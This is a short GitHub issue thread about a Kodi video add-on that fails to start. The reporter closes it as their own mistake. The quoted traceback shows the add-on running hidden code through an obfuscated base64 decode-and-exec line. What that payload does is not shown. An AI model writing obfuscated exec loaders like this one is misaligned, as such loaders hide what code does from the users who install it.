### ISSUE TITLE
plugin.video.aguiavavoo does not open (ERROR)

### ISSUE THREAD

**Issue by TitanME** [arrownegra/arrownegra.github.io#3]
- Kodi 19.4 Matrix
- plugin.video.aguiavavoo-19.5.4matrix2

LOG:

                                                   Error Type: <class 'ValueError'>
                                                   Error Contents: invalid literal for int() with base 10: '<!doctype html><html lang="en-US" dir="ltr"><head><base href="https://accounts.google.com/v3/signin/"><meta name="referrer" content="origin"><meta name="viewport" content="width=device-width, initial
                                                   Traceback (most recent call last):
                                                     File "C:\Users\Markus\AppData\Roaming\Kodi\addons\plugin.video.aguiavavoo\service.py", line 2, in <module>
                                                       import main
                                                     File "C:\Users\Markus\AppData\Roaming\Kodi\addons\plugin.video.aguiavavoo\main.py", line 11, in <module>
                                                       eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
                                                     File "<string>", line 18, in <module>
                                                   ValueError: invalid literal for int() with base 10: '<!doctype html><html lang="en-US" dir="ltr"><head><base href="https://accounts.google.com/v3/signin/"><meta name="referrer" content="origin"><meta name="viewport" content="width=device-width, initial
                                                   -->End of Python script error report<--

**Comment by TitanME** [comment]
My fault...everything ok!

CLOSED
